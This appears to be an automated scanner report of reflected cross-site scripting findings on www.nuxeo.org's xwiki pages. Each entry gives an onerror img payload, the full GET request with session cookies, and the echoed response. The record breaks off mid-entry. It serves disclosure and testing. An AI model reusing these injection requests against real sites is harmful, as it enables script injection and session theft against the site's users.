<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main6d639%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4b8cf8e51bb/CMIS?format=xar&name=Main6d639"><img src=a onerror=alert(1)>4b8cf8e51bb.CMIS&pages=Main6d639"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ef7"><img%20src%3da%20onerror%3dalert(1)>13a548dc1df was submitted in the REST URL parameter 5. This input was echoed as 38ef7"><img src=a onerror=alert(1)>13a548dc1df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/CMIS38ef7"><img%20src%3da%20onerror%3dalert(1)>13a548dc1df HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:29 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12882 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/CMIS38ef7%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E13a548dc1df?format=xar&name=Main.CMIS38ef7"><img src=a onerror=alert(1)>13a548dc1df&pages=Main.CMIS38ef7"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 95275<img%20src%3da%20onerror%3dalert(1)>692dc4b9251 was submitted in the REST URL parameter 5. This input was echoed as 95275<img src=a onerror=alert(1)>692dc4b9251 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/CMIS95275<img%20src%3da%20onerror%3dalert(1)>692dc4b9251 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:18:30 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12820 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/CMIS95275%3Cimg+src%3Da+onerror%3Dalert%281%29%3E692dc4b9251'>CMIS95275<img src=a onerror=alert(1)>692dc4b9251</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2ae2d<img%20src%3da%20onerror%3dalert(1)>460174238d1 was submitted in the REST URL parameter 4. This input was echoed as 2ae2d<img src=a onerror=alert(1)>460174238d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main2ae2d<img%20src%3da%20onerror%3dalert(1)>460174238d1/ContributionSpace HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:42 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13001 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Main2ae2d%3Cimg+src%3Da+onerror%3Dalert%281%29%3E460174238d1/">Main2ae2d<img src=a onerror=alert(1)>460174238d1</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 434b1"><img%20src%3da%20onerror%3dalert(1)>a501731b55d was submitted in the REST URL parameter 4. This input was echoed as 434b1"><img src=a onerror=alert(1)>a501731b55d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main434b1"><img%20src%3da%20onerror%3dalert(1)>a501731b55d/ContributionSpace HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:13:41 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13067 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main434b1%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea501731b55d/ContributionSpace?format=xar&name=Main434b1"><img src=a onerror=alert(1)>a501731b55d.ContributionSpace&pages=Main434b1"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6af3"><img%20src%3da%20onerror%3dalert(1)>761b200ad62 was submitted in the REST URL parameter 5. This input was echoed as f6af3"><img src=a onerror=alert(1)>761b200ad62 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/ContributionSpacef6af3"><img%20src%3da%20onerror%3dalert(1)>761b200ad62 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:33 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13051 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/ContributionSpacef6af3%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E761b200ad62?format=xar&name=Main.ContributionSpacef6af3"><img src=a onerror=alert(1)>761b200ad62&pages=Main.ContributionSpacef6af3"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 61c31<img%20src%3da%20onerror%3dalert(1)>d24e0bc59b3 was submitted in the REST URL parameter 5. This input was echoed as 61c31<img src=a onerror=alert(1)>d24e0bc59b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/ContributionSpace61c31<img%20src%3da%20onerror%3dalert(1)>d24e0bc59b3 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:31 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12989 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace61c31%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed24e0bc59b3'>ContributionSpace61c31<img src=a onerror=alert(1)>d24e0bc59b3</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f93c1<img%20src%3da%20onerror%3dalert(1)>4d9be4736ed was submitted in the REST URL parameter 4. This input was echoed as f93c1<img src=a onerror=alert(1)>4d9be4736ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Mainf93c1<img%20src%3da%20onerror%3dalert(1)>4d9be4736ed/Dashboard HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:40 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12897 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Mainf93c1%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4d9be4736ed/">Mainf93c1<img src=a onerror=alert(1)>4d9be4736ed</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210a4"><img%20src%3da%20onerror%3dalert(1)>0659efe6902 was submitted in the REST URL parameter 4. This input was echoed as 210a4"><img src=a onerror=alert(1)>0659efe6902 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main210a4"><img%20src%3da%20onerror%3dalert(1)>0659efe6902/Dashboard HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:49 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12963 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main210a4%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E0659efe6902/Dashboard?format=xar&name=Main210a4"><img src=a onerror=alert(1)>0659efe6902.Dashboard&pages=Main210a4"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b787b"><img%20src%3da%20onerror%3dalert(1)>f9b9ae24085 was submitted in the REST URL parameter 5. This input was echoed as b787b"><img src=a onerror=alert(1)>f9b9ae24085 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Dashboardb787b"><img%20src%3da%20onerror%3dalert(1)>f9b9ae24085 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:09 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12947 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/Dashboardb787b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef9b9ae24085?format=xar&name=Main.Dashboardb787b"><img src=a onerror=alert(1)>f9b9ae24085&pages=Main.Dashboardb787b"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 97ab6<img%20src%3da%20onerror%3dalert(1)>29fb3ec50ba was submitted in the REST URL parameter 5. This input was echoed as 97ab6<img src=a onerror=alert(1)>29fb3ec50ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Dashboard97ab6<img%20src%3da%20onerror%3dalert(1)>29fb3ec50ba HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:58 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12885 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard97ab6%3Cimg+src%3Da+onerror%3Dalert%281%29%3E29fb3ec50ba'>Dashboard97ab6<img src=a onerror=alert(1)>29fb3ec50ba</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4a8a"><img%20src%3da%20onerror%3dalert(1)>1bb236ad708 was submitted in the REST URL parameter 4. This input was echoed as b4a8a"><img src=a onerror=alert(1)>1bb236ad708 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Mainb4a8a"><img%20src%3da%20onerror%3dalert(1)>1bb236ad708/Downloads HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:13:17 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12963 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Mainb4a8a%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E1bb236ad708/Downloads?format=xar&name=Mainb4a8a"><img src=a onerror=alert(1)>1bb236ad708.Downloads&pages=Mainb4a8a"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4709<img%20src%3da%20onerror%3dalert(1)>207cbf0fc30 was submitted in the REST URL parameter 4. This input was echoed as b4709<img src=a onerror=alert(1)>207cbf0fc30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Mainb4709<img%20src%3da%20onerror%3dalert(1)>207cbf0fc30/Downloads HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:13:59 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12897 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Mainb4709%3Cimg+src%3Da+onerror%3Dalert%281%29%3E207cbf0fc30/">Mainb4709<img src=a onerror=alert(1)>207cbf0fc30</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfcbe"><img%20src%3da%20onerror%3dalert(1)>9b72863cbb6 was submitted in the REST URL parameter 5. This input was echoed as bfcbe"><img src=a onerror=alert(1)>9b72863cbb6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Downloadsbfcbe"><img%20src%3da%20onerror%3dalert(1)>9b72863cbb6 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:43 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12947 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/Downloadsbfcbe%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9b72863cbb6?format=xar&name=Main.Downloadsbfcbe"><img src=a onerror=alert(1)>9b72863cbb6&pages=Main.Downloadsbfcbe"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 373b0<img%20src%3da%20onerror%3dalert(1)>9fa509c902d was submitted in the REST URL parameter 5. This input was echoed as 373b0<img src=a onerror=alert(1)>9fa509c902d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Downloads373b0<img%20src%3da%20onerror%3dalert(1)>9fa509c902d HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:45 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12885 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/Downloads373b0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9fa509c902d'>Downloads373b0<img src=a onerror=alert(1)>9fa509c902d</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 34dd9<img%20src%3da%20onerror%3dalert(1)>4dbb20e4ed3 was submitted in the REST URL parameter 4. This input was echoed as 34dd9<img src=a onerror=alert(1)>4dbb20e4ed3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
